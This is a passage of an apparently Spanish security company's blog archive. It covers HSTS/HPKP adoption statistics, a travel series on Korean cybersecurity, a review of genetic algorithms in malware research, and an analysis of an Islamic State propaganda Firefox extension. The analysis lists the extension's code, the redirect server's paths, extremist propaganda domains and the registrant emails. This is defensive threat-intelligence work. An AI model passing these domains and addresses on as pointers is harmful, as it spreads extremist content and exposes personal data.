Alexa con dicha API y la lista de dominios con precarga habilitada, para saber si estos dominios precargados cumplen o no con las condiciones. Para ejecutar este proceso cada dominio se visita en tiempo real y se comprueban los posibles errores. Resulta muy interesante comprobar que, de esos 2056 dominios precargados del top de Alexa, 662 contienen errores, que, estrictamente hablando, no deberían ser precargados. Incluso hemos detectado que, 67 de esos 2056 precargados que están incluidos en la lista, no contienen ni siquiera la directiva de precarga en la cabecera, lo cual viola una de las condiciones de pertenencia. Whatsapp.com y Facebook.com son ejemplos de dominios que no cumplen las condiciones de precarga, pero pertenecen a esta lista. Muestra del error a la hora de comprobar Facebook contra la API del sistema de preload Conclusiones Aunque los protocolos HSTS y HPKP supuestamente deben proveer una capa adicional de seguridad a las comunicaciones HTTPS, su implementación no se ha generalizado. A nivel de servidor, muchos de los dominios más relevantes de Internet ni siquiera los implementan. Además, entre el reducido número de dominios que lo usan, existe un número significante con errores de implementación, incluso pasando por alto las recomendaciones de las respectivas RFCs. Esta situación muestra tanto el bajo índice de adopción de éstos como, de alguna manera, la malinterpretación de cómo aprovechar completamente las ventajas que proporcionan estos protocolos. Algunas de las figuras más interesantes de nuestro informe son: De Alexa, hemos recopilado 632648 dominios HTTPS, y 901958 dominios HTTP. Hemos recogido 30886979 dominios HTTPS (puerto 443) y 45330802 dominios HTTP (puerto 80). Un total de 76217781) de Shodan. Solo el 1,9% de los dominios en Shodan usan HSTS correctamente sobre HTTPS, mientras que solo un 5,35% de Alexa lo hacen. 4717 (apenas un 0.74%) del top de un millón de dominios de Alexa usando HTTPS (632648) implementan HSTS de la forma más correcta. 175 del top de un millón de dominios de Alexa (apenas el 0,02%) usando HTTPS (632648) implementan HPKP de la mejor forma posible. 20% del top de dominios de Alexa usando HPKP sobre HTTPS usan uno o ningún pin, que resulta inútil desde el punto de vista del navegador ya que lo ignorará. La mayoría de ellos (un 73,65%) usan el certificado intermedio para el pinning. 17% de los dominios de Alexa que implementan HPKP usan un valor max-age erróneo o que se ignorará. El pin más usado (un certificado de Comodo) fija 40 dominios diferentes de Alexa y Shodan. Hay un total de 18197 dominios precargados en la lista de Chromium (compartida con Firefox). A fecha de diciembre de 2016, solo 2056 dominios del top de un millón de Alexa están es esa lista. De esos 2056 dominios precargados en el top de Alexa, 662 contienen algunos errores al comprobarlos contra la API oficial de precarga, por tanto, estrictamente hablando, no deberían ser precargados. Whatsapp.com y Facebook.com son ejemplos de dominios que no cumplen las condiciones de precarga obligatorias, pero pertenecen a dicha lista.
23 de enero de 2017
Un hacker en Corea IV
El Paralelo 38 Norte, Joint Security Area, Panmunjom o DMZ son términos con los que la mayoría de las personas no están familiarizadas, pero sin embargo era uno de los motivos principales de mi visita a Corea del Sur y una de las experiencias más extrañas que he tenido en mi vida, incluso con la nieve que marcó mi llegada al lugar. Ubicada solo a 50 Km de Seúl, la DMZ o Zona Desmilitarizada es una franja de aproximadamente 240 km de largo por 4 km de ancho que divide la Península de Corea, separando Corea del Norte de Corea del Sur. Recibe su nombre debido a que es una zona sin actividad militar activa y (casi) sin civiles. Los 240 km corresponden al ancho de la Península y los 4 km corresponden a que, durante el armisticio de Paz, cada país debió retraer sus tropas 2 km del frente de batalla, creando una barrera neutral de 4 kilómetros de ancho sobre el paralelo 38. El Paralelo de Corea fue el antiguo límite entre EEUU y la URSS durante la Segunda Guerra Mundial, antes de la formación de la República Democrática de Corea (Norte) y la República de Corea (Sur) en 1948, y quizás una de las zonas más calientes durante la guerra fría. Actualmente, la parte sur de la DMZ está administrada por Estados Unidos en representación de la ONU, y la parte norte está administrada por Corea del Norte. Por su parte, Panmunjom (hoy en territorio Norte) es el nombre de la villa donde en 1953 se firmó el armisticio; alberga unas pocas familias herederas de aquellas que fueron testigo de tal acto. Aunque se considera una zona neutral, cientos de veces se han intentado incursiones militares por encima y por debajo de la DMZ, incluso con escaramuzas que se han cobrado algunas vidas. Actualmente se pueden visitar algunos de los túneles que habrían permitido ataques de infantería liviana. Este también es el motivo por el cual el Rio Han (del que hablé en la primera entrega) se encuentra delimitado con tejido y vallas para detectar cualquier tipo de incursión costera o terrestre, ya que con -20° centígrados, el río se congela y es posible vadearlo a pie. En la “zona turística” de visita pública y en el infaltable shopping se encuentra personal militar de los dos países y todavía existe -a modo de recuerdo indeleble- una línea demarcatoria que, curiosamente pasa por el medio de la sala y la mesa donde se firmó el acuerdo en el punto denominado Joint Security Area (JSA). Para una mejor idea se puede leer y ver el libro y la película homónimos. De esta historia (muy resumida) viene mi fascinación por la DMZ. ¿Quién diría que cuando configuramos servicios, redes y servidores con DMZ, nos caería toda esa historia encima? Volviendo al mundo de la seguridad, tradicionalmente los tipos de controles se agrupan en físicos, técnicos/lógicos y administrativos. En la DMZ se los puede ver a todos y los mismos son tangibles: • Vigilancia física: personal militar, perros y cámaras en todo el perímetro. • Proceso de autorización (AAA): Identificación, mediante la solicitud repetitiva del pasaporte en distintas zonas; Autenticación, contra una base de datos de acceso al país y solicitud de visita a la Zona; Autorización, permiso expreso para visitar la zona por un par de horas; Accountability, registro de las actividades. • Identificación de personal, administración de roles y permisos, control de acceso de personal no autorizado. • Procesos para autorización y otorgamiento de privilegios. • Rotación de personal y tareas. • Firewall físico de 4 km de ancho: división de zona de confianza de la que no lo es: • Need to Know: privilegio para ver y conocer sólo lo que desean y necesitan mostrarte. • Menor privilegio: todo lo que no está permitido está denegado. Por ejemplo, no se puede usar cámara fotográfica ni teléfonos móviles en la zona. Seguramente hay cientos de operaciones de control que se me escapan en este momento, pero las mencionadas sirven de ejemplo para confirmar que todas las actividades que desarrollamos en el mundo de la seguridad de la información tienen su fundamento en el mundo físico y siempre es un buen espejo donde mirar. Otra provincia de interés en Corea del Sur es Jeju. Ubicada al sur del país, en el estrecho de Corea, es la isla más grande de la península y, desde 2011, es considerada una de las Siete maravillas naturales del mundo por la belleza de sus volcanes y la preservación de la biosfera. Su tamaño, aislamiento natural y cantidad de habitantes hace que sea campo de estudio ideal para (el cultivo de mandarinas exquisitas y) diferentes experimentos tecnológicos que luego son extrapolados en el territorio continental. En Jeju, por ejemplo, nació la empresa del mensajero Kakao Talk -que ya mencioné en otra entrega- y se encuentra el Korean Space Wheater Center, responsable del monitoreo de la actividad solar en oriente, tan importante en la detección de radiación y partículas dañinas para el ser humano y las comunicaciones. Como mencioné en la segunda parte, Jeju es el campo de experimentación de SmartGrid más importante del mundo. SmartGrid es un sistema “inteligente” (porque ahora todo es inteligente) que permite controlar la generación, distribución y consumo de electricidad. A través del intercambio de datos y de técnicas de Data-Minning permite “conocer” los hábitos del usuario para mejorar su experiencia de consumo, aumentar la eficiencia, disminuir la emisión de dióxido de carbono y evitar el calentamiento global. La combinación de dispositivos de hardware y software hace necesario también la creación de tecnología de control como Latch, el cual permite la protección de concentradores que se encargan de gestionar los Contadores PLC desde el propio diseño de los dispositivos. Con esto en mente, en la Isla de Jeju se encuentran Korea Electric Power Corporation (KEPCO) y Korea Southern Power (KOSPO) que buscan -mediante distintos acuerdos nacionales e internacionales y la instalación de miles de paneles solares y molinos eólicos- llevar adelante una ciudad verde e inteligente que sirva de base para futuros emplazamientos tecnológicos eficientes en Corea, Japón y China. Seguimos disfrutando de la isla y ya llegamos al final de nuestro recorrido. Pero antes, ningún amante de la tecnología ( friki o techie) puede dejar de visitar un museo de computadoras. Para ello fui a Nexon Computer Museum, inaugurado en 2013 y que tiene más de 6.500 aparatos y miles de programas de “aquellos tiempos”. Este museo hace las delicias de quienes crecimos programando en una TI-99, Commodore 64, MSX (existe una discusión si es de origen japonés o coreano) o Apple I o Apple II (en el museo hay una original reconstruida y firmada por Woz); matamos marcianos en el Galaga; caímos cinco pisos en el Prince of Persia; rompimos e intentamos arreglar un Family Game o tildamos un Pinball. Finalmente, nos mudamos a Busan, ubicada al Sudeste de la península, es la segunda ciudad del país, después de Seúl y dispone de uno de los puertos más importante del mundo por tonelaje de carga y transporte. Mi llegada a Busan fue en tren a 300 Km/hora, el mismo que aparece en la película de zombies (recomendada para los amantes del género) “ Train to Busan”, traducida por el marketing como “Estación zombie” o “Invasión zombie”. Para compensar el ataque de nostalgia tecnológico del museo, y dejando por una vez la seguridad de la información de lado, mi interés por esta ciudad era turístico, por sus playas y belleza natural. Con esto me despido de Corea del Sur y también de esta crónica en la cual intenté remarcar las principales observaciones realizadas en un país, donde la tecnología es omnipresente y la seguridad es una necesidad de estado, ya sea por la paranoia heredada de la guerra fría o el estado de alerta permanente en el que viven los países de la zona. En mis tres meses viviendo en Corea aprendí mucho, pero lo más importante es lo siguiente: pretender que conocemos la solución a problemas que no tenemos (por ejemplo, la ciberguerra) es un gran error. En Internet, debemos comenzar a mirar el mundo como un gran globo sin fronteras que, sin embargo, está dividido por barreras tan fijas y firmes como la DMZ. Cristian Borghello ElevenPaths Argentina Cristian.borghello@11paths.com @crisborghe También te puede interesar: Un hacker en Corea_El inicio Continúa la aventura: Un hacker en Corea II Un hacker en Corea III
19 de enero de 2017
Browser Extension Usage by the Islamic State Propaganda
One of the tools that the Islamic State has been using to spread its propaganda is the use of social networks. In the past they have shown how capable they are of expanding their capabilities to cover smartphones and mobile devices, but recently they have also opted for the development of browser add-ons in order to further facilitate access to their content. Although Firefox extensions are mainly distributed by means of the official market run by Mozilla, the Amaq News Agency, identified as part of the Islamic State’s propaganda apparatus, is also distributing .xpi files in related websites. These files are compressed in .zip and renamed to a .xpi that contains the Javascript, CSS and HTML code that defines the behaviour of the extension. About this extension, we have identified at least two different versions, 1.0.1 and 1.0.2, whose folder structure contains the same series of source and data files. . ├── bootstrap.js ├── data │ ├── safe-16.png │ ├── safe-32.png │ ├── safe-48.png │ ├── safe-64.png │ ├── safe.png │ ├── unsafe-16.png │ ├── unsafe-32.png │ ├── unsafe-48.png │ ├── unsafe-64.png │ └── unsafe.png ├── icon.png ├── install.rdf ├── lib │ └── main.js ├── META-INF │ ├── manifest.mf │ ├── mozilla.rsa │ └── mozilla.sf └── package.json The most interesting files are three: package.json , install.rdf and the Javascript source file found at lib/main.js : package.json contains metadata and information about the extension like the name, the author, the licenses or the permissions required. { "name": "amaq", "title": "Amaq AR", "id": "jid1-5Fs7iTLaaUaZBgwdar@amaq", "description": "Amaq AR.", "author": "Amaq AR", "license": "MPL 2.0", "version": "1.0.2", "icon": "icon.png", "permissions": { "private-browsing": true }, "engines": { "firefox": ">=38.0a1", "fennec": ">=38.0a1" }, "main": "lib/main.js", "devDependencies": { "gulp": "^3.8.11", "gulp-image-resize": "^0.6.0", "gulp-rename": "^1.2.2" } } install.rdf defines in the field em:targetApplication that the extension is thought to be installed in certain versions. In this case, it explicitly shows that it is valid for different versions of Firefox Browsers, including Firefox for Android (this is defined by the tag <em:id>{aa3c5121-dab2-40e2-81ca-7ea25febc110}</em:id> tagasda). <em:targetApplication> <Description> <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <em:minVersion>38.0a1</em:minVersion> <em:maxVersion>43.0</em:maxVersion> </Description> </em:targetApplication> <em:targetApplication> <Description> <em:id>{aa3c5121-dab2-40e2-81ca-7ea25febc110}</em:id> <em:minVersion>38.0a1</em:minVersion> <em:maxVersion>43.0</em:maxVersion> </Description> </em:targetApplication> lib/main.js defines the code of the extension itself. In this case, it opens a new tab pointing to a given URL as shown in lines 107 and 108. The only difference between versions is the IP address shown in line 108. var tabs=require("sdk/tabs"); tabs.open("http://190.14.37.220/v/"); Using the extension as a bookmark In the case of the first release of the add-on 1.0.1, the URL opened was hosted at 88.80.20.1 IP address (a non-accessible address linked to an internet services provider settled in Sweden) while in the most recent version this IP address is 190.14.37.220 . This address, still accessible at the moment of writing this article, is linked to an anonymous hosting provider settled in Panama that runs a nginx 1.6.2. However, this resource seems not to be hosting the contents itself because if we access to this URL it responds a 302 Moved Temporarily code and redirects us to jkikki.at, the agency website. There, this Firefox extension can also be downloaded as amaq_news_agency_ar-1.0.2.xpi together with a hash of the file that would ultimately allow users to verify the legitimacy of the extension. $ curl http://190.14.37.220/v/ -I HTTP/1.1 302 Moved Temporarily Server: nginx/1.6.2 Date: Tue, 10 Jan 2017 11:02:55 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://jkikki.at/ The referred website is hosting news in Arabic about Amaq and the Islamic State and is protected by Cloudflare making it impossible to know the real location of the systems used to serve the contents. By using this approach, banning the access to jkikki.at would not be enough to stop their propagation mechanisms considering that the application developer would only need to modify the Location field to redirect to the new domain in which the content would be hosted. Identifying other affiliated websites The structure of the URL found in the extension suggested the possibility of the existence of other domains. The tests conducted have returned new 302 responses that pointed to at least 6 other domains also protected by Cloudflare and whose content is also tied to the Islamic State. The details of the certificates used indicate recent validity periods as can be seen in the following table. URL Redirected domain Language Certificate valid since http://190.14.37.220/b/ bibifm.at Arabic 2017/01/10 http://190.14.37.220/f/ vosn.pw N/F 2016/01/06 http://190.14.37.220/g/ baqiya.ga German 2017/01/01 http://190.14.37.220/h/ halummu.at N/F N/F http://190.14.37.220/t/ nikmat.gq Bengali 2017/01/10 http://190.14.37.220/u/ vijestiummeta.ga Bosnian 2017/01/05 http://190.14.37.220/v/ jkikki.at Arabic 2016/12/31 Apart from this extension, there is no evidence of the existence of others with a similar behavior that point to the rest of domains. However, the recent creation of the certificates suggests that newer similar add-ons could be created easily by modifying only the URL of the original file to point to one of the URL shown before. Registrant information and other metadata Regarding the registry of identified domains, those that do not present special privacy protection measures have been registered email accounts using the tutanota.com encrypted email provider taking into account that the @keemail.me , @tuta.io , @tutamail.com and @tutanota.com (used to register a domain linked to the organization which is no longer used like jkikki.de ) are different domains that make use of this service. Domain Registrant bibifm.at francnomoli@keemail.me vosn.pw e12b69957ce848b0b00e47a96a5682ef.protect@whoisguard.com baqiya.ga N/F halummu.at elana.samra@tuta.io nikmat.gq N/F vijestiummeta.ga N/F jkikki.at stephenjells@tutamail.com jkikki.de tomorrowdoma@tutanota.com On the other hand, the rest of files identified in the extensions do not show too many details apart from some EXIF data found in the agency logos and icons. These files seem to have been edited with various Adobe products for Windows according to its metadata. Assesment The Islamic State has shown in the past that it has used the means at its disposal to massively spread its content in both, social networks and mobile applications. In this case, the use of a browser plug-in is another example of how the individuals linked to this organization are capable of adapting themselves to ensure the dissemination of content using not only a technological assets located in different countries, but tools and systems such as Cloudflare and various servers and methods to ensure the effectiveness of the difussion of their message. Félix Brezo Intelligence Analyst at ElevenPaths @febrezo Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec
13 de enero de 2017
Un hacker en Corea III
Continúo con la historia de mis aventuras en Corea, si se me permite el desatino de llamar “aventura” a tres meses de saciar mi curiosidad con respecto a una cultura milenaria y a sus grandes avances en tecnología. Cuando llegué a Corea, una de las primeras cosas que descubrí es la importancia que los coreanos le dan al número “1”. En un país donde Google y Whatsapp no son primeros (ni segundos), ser el “1” es un tema de debate serio. Los coreanos están primeros en muchas cosas como el nivel de conectividad, la cantidad de transacciones con tarjeta de crédito, la velocidad de Internet, la cobertura 4G; y también en su adicción al trabajo y al Soju/Sochu, un licor tradicional destilado del arroz. Seguramente se quedaron pensando sobre el buscador… En Corea, las primeras opciones para buscar información son Naver y Daum, mientras que el mensajero por excelencia es Kakao Talk. Una demostración más, lo que damos por válido y sabido en occidente, de poco nos sirve después de pasar los Montes Urales y el Paralelo 38, uno de los motivos principales de mi viaje y del que hablaré en extenso en el próximo y último artículo (el bonus track de esta serie). Si de ser primero se trata, Corea tampoco es ajeno al cibercrimen, siendo muy altas las tasas de infección con malware financiero ya sea en computadoras o móviles, así como la propagación de APT (Amenazas Persistentes y Avanzadas) dirigidas a entidades gubernamentales. Las APT tienen un papel relevante y, como ya mencioné en la primera parte, la utilización masiva de Windows e Internet Explorer no ayuda a solucionar el problema. Desde finales de los 90, han existido varios casos de Windows Zero-Day y vulnerabilidades explotadas en ActiveX que han afectado a cientos de miles de usuarios, estaciones de radio y televisión, bancos, ATM, e infraestructuras críticas. En este último se enmarcan las Operaciones Kimsuky y DarkSeoul una serie de ataques en los cuales se utilizó malware contra servidores y usuarios de Korea Hydro and Nuclear Power (KHNP), la cual opera 23 reactores nucleares y varias centrales hidroeléctricas del país. La seriedad de estos ataques remotos, lograron elevar el nivel de alerta DefCon -heredado de EE.UU., su principal socio económico y militar- de 3 a 5 y llevó a Corea a desarrollar su CyberSecurity Enhancement Measures, demostrando una vez más que se puede aprender de los errores. Los índices de creación de malware e infección, así como la posibilidad de ataques dirigidos son tan altos que, incluso en 2012 nació la serie de televisión Ghost para concienciar sobre los problemas en la red. Esta serie, que también trata temas tan escabrosos como el Gromming y el acoso escolar, contó con la colaboración de la Unidad de Cibercrimen de la Policía de Korea y desde ese momento se publican los Índices Nacionales de Cibercrimen. Todo lo mencionado, hace que organizaciones que pude conocer durante mi estadía consideren los siguientes puntos como fundamentales: • Instalación de dispositivos de detección y bloqueo de aplicación dañinas, como firewall, IDS, IPS, Anti-DDoS, etc. Muchas de las herramientas utilizadas son desarrolladas localmente en Corea, por ejemplo, por la empresa Igloo Security y, tal vez la más conocida en occidente, AhnLab Security. Con respecto a servicios Anti-DDOS no es extraño encontrar la tecnología de Arbor que, al igual que en Telefonica y ElevenPaths se utilizan para crear escudos Anti-DDOS desde la red. • Instalación de dispositivos y aplicaciones de control de APTs. En este caso no existe una discusión sobre la conveniencia de su instalación, es un hecho como lo es el backup, un sitio de contingencia o la instalación de un antivirus tradicional. • Inspección profunda de paquetes para determinar su origen y posibles amenazas. Un ejemplo sencillo: cada SMS enviado es analizado por las compañías de comunicaciones para determinar si contiene una URL y su nivel de riesgo para el destinatario. En el caso de detectar algún tipo de amenaza, se bloquea (el SMS y la URL) a nivel nacional a través de una red de colaboración en donde intervienen varias organizaciones públicas y privadas, ya mencionadas en mi primer artículo. Por eso, en ElevenPaths hemos desarrollado Tacyt, que permite analizar millones de aplicaciones móviles dañinas y que suscriben a la víctima a servicios SMS Premium. • Análisis forense del malware detectado localmente. En este caso la responsabilidad recae en los expertos del Laboratorio de KISA, una de las organizaciones públicas responsables de la seguridad de las comunicaciones en Corea. Una vez más, los hallazgos (firmas, detección heurística, patrones de comportamiento, etc.) son compartidos con el resto de los interesados. • En algunos casos, cuentan con una línea de ayuda telefónica por problemas relacionados con el malware (no, no es broma). El tema de la colaboración me lleva a mencionar otro aspecto fundamental en la lucha contra el cibercrimen: la cooperación internacional y la cooperación público privada. Por ejemplo, la alianza estratégica de ElevenPaths con Europol y que nuestro CEO, Pedro Pablo Pérez, represente a Telefónica en la Organización Europea de Ciberseguridad ( ECSO), son iniciativas en este sentido. “ Es fácil ver las consecuencias de un ataque, pero es difícil saber qué y cómo sucedió, además de intentar determinar quién y cómo lo hizo”. Es necesario que los países definan sus ciberestrategias en conjunto con los demás estados; un esfuerzo individual es poco más que nada. Actualmente, United Nations Group of Governmental Experts (GGE) está trabajando en un protocolo/ framework internacional de actuación para tratar cualquier tipo de incidente que involucre un incidente digital y Corea del Sur colabora con el mismo debido a los “problemas” con sus vecinos. Finalmente, me sorprendió la cantidad de papers publicados por investigadores coreanos. Advertir este punto me sirvió para mejorar mis búsquedas (en Naver y Google) cuando hago investigación sobre temas poco comunes, que van más allá de un buzzword y que están fuera del foco de atención público. Algunas lecturas recomendadas de mis profesores: Gabi’s World, Cryptographic Lab, Cybercrime Tech, Human Behavior. En la última parte de nuestro recorrido por Corea, contaré algunas curiosidades de los lugares turísticos y de interés que visité; entre ellos la ya mencionada Isla Jeju y la famosa DMZ (Zona Desmilitarizada) (ubicada en el Paralelo 38), que actualmente sirve de división política con Corea del Norte y que dio origen al popular término que todos conocemos cuando hablamos de networking. Cristian Borghello ElevenPaths Argentina Cristian.borghello@11paths.com @crisborghe También te puede interesar: Un hacker en Corea_El inicio Continúa la aventura: Un hacker en Corea II Un hacker en Corea IV
12 de enero de 2017
Uso de extensiones de navegador por parte del aparato propagandístico del Estado Islámico
Una de las herramientas que mejor ha sabido utilizar el Estado Islámico para difundir su propaganda es el uso de las redes sociales. En el pasado han demostrado ser capaces de ampliar sus capacidades hacia el mundo móvil, pero recientemente también han optado por el desarrollo de complementos para el navegador con el objetivo de facilitar aún más el acceso a sus contenidos. Aunque las extensiones de Firefox se pueden distribuir a través del mercado oficial de Mozilla, se tiene constancia de que la Agencia Amaq, identificada como medio propagandístico del Estado Islámico, está distribuyendo los ficheros .xpi de la extensión a través de páginas afines. Estos archivos son ficheros comprimidos en .zip a los que se les cambia el formato y que contienen el código Javascript, CSS y HTML que definirá el comportamiento de la extensión. Sobre esta extensión, se han identificado dos versiones, la 1.0.1 y 1.0.2., cuya estructura de carpetas descomprimida contiene la misma serie de ficheros. . ├── bootstrap.js ├── data │ ├── safe-16.png │ ├── safe-32.png │ ├── safe-48.png │ ├── safe-64.png │ ├── safe.png │ ├── unsafe-16.png │ ├── unsafe-32.png │ ├── unsafe-48.png │ ├── unsafe-64.png │ └── unsafe.png ├── icon.png ├── install.rdf ├── lib │ └── main.js ├── META-INF │ ├── manifest.mf │ ├── mozilla.rsa │ └── mozilla.sf └── package.json Los archivos más interesantes son tres: el fichero package.json, el fichero install.rdf y el fichero lib/main.js: · package.json contiene metadatos e información sobre la extensión como el nombre, el autor, la licencia o los permisos que requiere. { "name": "amaq", "title": "Amaq AR", "id": "jid1-5Fs7iTLaaUaZBgwdar@amaq", "description": "Amaq AR.", "author": "Amaq AR", "license": "MPL 2.0", "version": "1.0.2", "icon": "icon.png", "permissions": { "private-browsing": true }, "engines": { "firefox": ">=38.0a1", "fennec": ">=38.0a1" }, "main": "lib/main.js", "devDependencies": { "gulp": "^3.8.11", "gulp-image-resize": "^0.6.0", "gulp-rename": "^1.2.2" } } · install.rdf indica en su campo em:targetApplication que la extensión puede ser instalada en determinadas versiones. En este caso se especifica explícitamente que la extensión es válida tanto para el navegador Firefox como para Firefox en Android. <em:targetApplication> <Description> <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <em:minVersion>38.0a1</em:minVersion> <em:maxVersion>43.0</em:maxVersion> </Description> </em:targetApplication> <em:targetApplication> <Description> <em:id>{aa3c5121-dab2-40e2-81ca-7ea25febc110}</em:id> <em:minVersion>38.0a1</em:minVersion> <em:maxVersion>43.0</em:maxVersion> </Description> </em:targetApplication> · lib/main.js contiene la lógica del complemento en sí misma. En este caso se resume en la apertura de una nueva pestaña hacia una dirección URL concreta en las líneas 107 y 108. La única diferencia entre la primera versión y la segunda es la dirección URL a la que enlazan. var tabs=require("sdk/tabs"); tabs.open("http://190.14.37.220/v/"); La extensión como marcador En el caso de la versión 1.0.1, la URL a la que apuntaba estaba alojada en la dirección 88.80.20.1 (dirección ya no disponible vinculada a un proveedor de servicios de internet afincado en Suecia) mientras que en la versión más reciente esta dirección IP es la 190.14.37.220 . Esta dirección, vigente a fecha de redacción de este artículo, está vinculada a un proveedor de servicios de hosting anónimo afincada en Panamá y alojada detrás de un servidor nginx 1.6.2. Dicho proveedor de servicios de hosting parece no contener la página web en cuestión ya que al consultar la URL de la web devuelve un código 302 Moved Temporarily al dominio jkikki.at desde el que también se facilita un enlace de descarga al fichero amaq_news_agency_ar-1.0.2.xpi , junto con un hash del mismo que permitiría al usuario verificar la legitimidad de la extensión. $ curl http://190.14.37.220/v/ -I HTTP/1.1 302 Moved Temporarily Server: nginx/1.6.2 Date: Tue, 10 Jan 2017 11:02:55 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://jkikki.at/ El sitio web enlazado almacena información en árabe sobre Amaq y el Estado Islámico y se encuentra protegido por Cloudflare por lo que no ha sido posible establecer la localización real de las máquinas empleadas. Al utilizar esta aproximación, bloquear el acceso al dominio jkikki.at no sería suficiente para detener la propagación del contenido ya que el desarrollador de la aplicación solamente tendría que modificar el campo Location de la redirección al nuevo dominio en el que alojen el contenido. Identificando otras páginas afiliadas La estructura de la URL sugiere la posibilidad de que existan otros dominios. Las pruebas realizadas han devuelto también el código 302 al apuntar hacia al menos otros 6 dominios también protegidos por Cloudflare y cuyo contenido también está vinculado con temática vinculada al Estado Islámico. Los detalles de los certificados empleados indican períodos de validez recientes tal y como se puede ver en la siguiente tabla. URL Dominio de redirección Idioma Certificado válido desde (aaaa/mm/dd) http://190.14.37.220/b/ bibifm.at árabe 2017/01/10 http://190.14.37.220/f/ vosn.pw N/F 2016/01/06 http://190.14.37.220/g/ baqiya.ga alemán 2017/01/01 http://190.14.37.220/h/ halummu.at N/F N/D http://190.14.37.220/t/ nikmat.gq bengalí 2017/01/10 http://190.14.37.220/u/ vijestiummeta.ga bosnio 2017/01/05 http://190.14.37.220/v/ jkikki.at árabe 2016/12/31 Al margen de esta extensión, no se tiene constancia de la existencia de otras de comportamiento similar que apunten al resto de dominios. Sin embargo, la reciente creación de los certificados hace pensar que podrían crearse próximamente otras extensiones similares modificando únicamente la dirección URL de la extensión amaq_news_agency_ar-1.0.2.xpi. Información de los registros y metadatos Con respecto al registro de los dominios identificados, aquellos que no presentan especiales medidas de protección de la privacidad, han sido registrados con cuentas de correo asociadas al buzón cifrado de correo tutanota.com ya que tanto las direcciones @keemail.me, @tuta.io, @tutamail.com y @tutanota.com enlazan con dicho servicio. Dominio Registrador asociado bibifm.at francnomoli@keemail.me vosn.pw e12b69957ce848b0b00e47a96a5682ef.protect@whoisguard.com baqiya.ga N/F halummu.at elana.samra@tuta.io nikmat.gq N/F vijestiummeta.ga N/F jkikki.at stephenjells@tutamail.com jkikki.de tomorrowdoma@tutanota.com Por otro lado, el resto de ficheros identificados en las extensiones no muestran demasiados detalles. Los datos EXIF de los logotipos de la agencia que aparecen en la extensión parecen haber sido editados con diversos productos de Adobe para Windows según sus metadatos. Valoración final El Estado Islámico ha demostrado en el pasado que ha sabido utilizar los medios a su alcance para dar una difusión lo más amplia posible de sus contenidos, tanto a través de las redes sociales como a través de aplicaciones móviles. En este caso, la utilización de un complemento de navegador es un ejemplo más de cómo es capaz de adaptarse para garantizar la difusión de contenido haciendo uso, ya no solamente de infraestructura tecnológica situada en diferentes países, si no de tecnologías como Cloudflare y diversos servidores y métodos para garantizar la vigencia de su mensaje. Félix Brezo Intelligence Analyst at ElevenPaths @febrezo Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec
11 de enero de 2017
Algoritmos evolutivos y malware. Conclusiones (y VI)
No, los algoritmos evolutivos no tienen mucho que ver con la evolución de los virus. El título era una "trampa" con varios objetivos: por un lado atraer a lectores tanto interesados en la materia como potenciales curiosos y por otro, demostrar que hay investigadores que han visto en los algoritmos evolutivos una herramienta "natural" para analizar el comportamiento del malware. Pero no suele ser buena idea. En el malware, los algoritmos evolutivos normalmente tienen sentido para resolver el mismo problema que en cualquier otro área o campo de análisis. Y aun así parece que no se han llegado a conclusiones que merezcan la pena por ahora. Vamos a ver qué podemos concluir tras el estudio de buena parte de la investigación académica existente al respecto. El uso típico del algoritmo genético Tras este recorrido por los estudios realizados que mezclan malware con algoritmos evolutivos en general, se observa claramente que el papel de los algoritmos genéticos mayoritariamente es el de optimizador de algoritmos de aprendizaje o clasificación. En los sistemas de aprendizaje y clasificación, se utilizan las características seleccionadas por el algoritmo genético para implementarlos con mayor eficiencia y eficacia. En general, se suelen usar para combatir el fenómeno conocido como "maldición de la dimensionalidad", que fundamentalmente pretende encontrar el número correcto de atributos o características que hacen que el clasificador sea efectivo sin caer en el sobreaprendizaje. Este tipo de utilidad no supone novedad, puesto que el uso de algoritmos genéticos como optimizadores de clasificadores se lleva utilizando desde hace tiempo en bastantes áreas. De hecho, es un fenómeno ya muy estudiado el cómo se estructura y permite mejorar los sistemas de extracción de características y aprendizaje como demuestra este estudio de 1995. Esquema de uso de GA en los sistemas de aprendizaje. Por tanto, si bien la eficacia de los algoritmos genéticos resulta probada, en estos estudios se utiliza el malware como excusa para confirmarlo. El reto de las investigaciones no resultan tanto en una aplicación novedosa de los algoritmos genéticos sobre el estudio del malware, sino en fundamentalmente encontrar el enfoque adecuado para representar los datos: qué y cómo clasificar dentro del mundo del malware, aplicando luego técnicas ya conocidas para ejecutar esa clasificación. En resumen, una técnica "básica" pero ahora con el malware como objeto de estudio. Esquema de uso de GA en la extracción de funcionalidades Otros usos más "originales" Solo algunos artículos se salen de este esquema más o menos cerrado: " Malware detection based on dependency graph using hybrid genetic algorithm", que utiliza algoritmos genéticos para resolver grafos (como representación del malware de script) y "A retrovirus inspired algorithm for virus detection & optimization", "Evolvable malware", "Specialized Genetic Algorithm Based Simulation Tool Designed For Malware Evolution Forecasting", que utilizan algoritmos evolutivos para evolucionar las firmas o la funcionalidad del propio malware. Del primero, se usa algoritmos genéticos para resolver un problema concreto y diferente: encontrar grafos isomorfos, y por tanto creemos que es el estudio que más innova desde el punto de vista del uso de algoritmia evolutiva aplicada a la detección de malware. Las investigaciones que utilizan algoritmos evolutivos para evolucionar las firmas o la funcionalidad del propio malware, aunque novedosos en su aproximación para el uso de algoritmos genéticos, no resultan especialmente útiles en la vida real debido a la propia naturaleza de la construcción de firmas o creación de malware. Las firmas de malware no "evolucionan" de la manera que intuitivamente se podría percibir, puesto que son el resultado de un análisis (automático o manual) realizado de forma totalmente diferente por diferentes empresas privadas, que habitualmente conservan esta información como secreto industrial y que forma parte de su propiedad intelectual más valiosa. Por tanto, afrontar una potencial evolución de una "firma" como algo matemático o sujeto a reglas, no puede ser generalizado ni es realista en la práctica. Si todos lo usan para lo mismo, ¿qué los diferencia? Del resto de artículos que utilizan los algoritmos evolutivos como reductores de dimensionalidad (su uso más común), solo cabe destacar y analizar su aportación desde el punto de vista del enfoque utilizado para abordar el problema. En este caso, el enfoque de cada análisis (y lo que permitirá saber si el trabajo es interesante o no) fundamentalmente se diferencia en: Tipos de muestras de malware: Malware para Windows, sistemas UNIX, Android... Conjunto de malware de muestra: Aquí, se suele recurrir a conjuntos de malware conocido (como VX Heaven 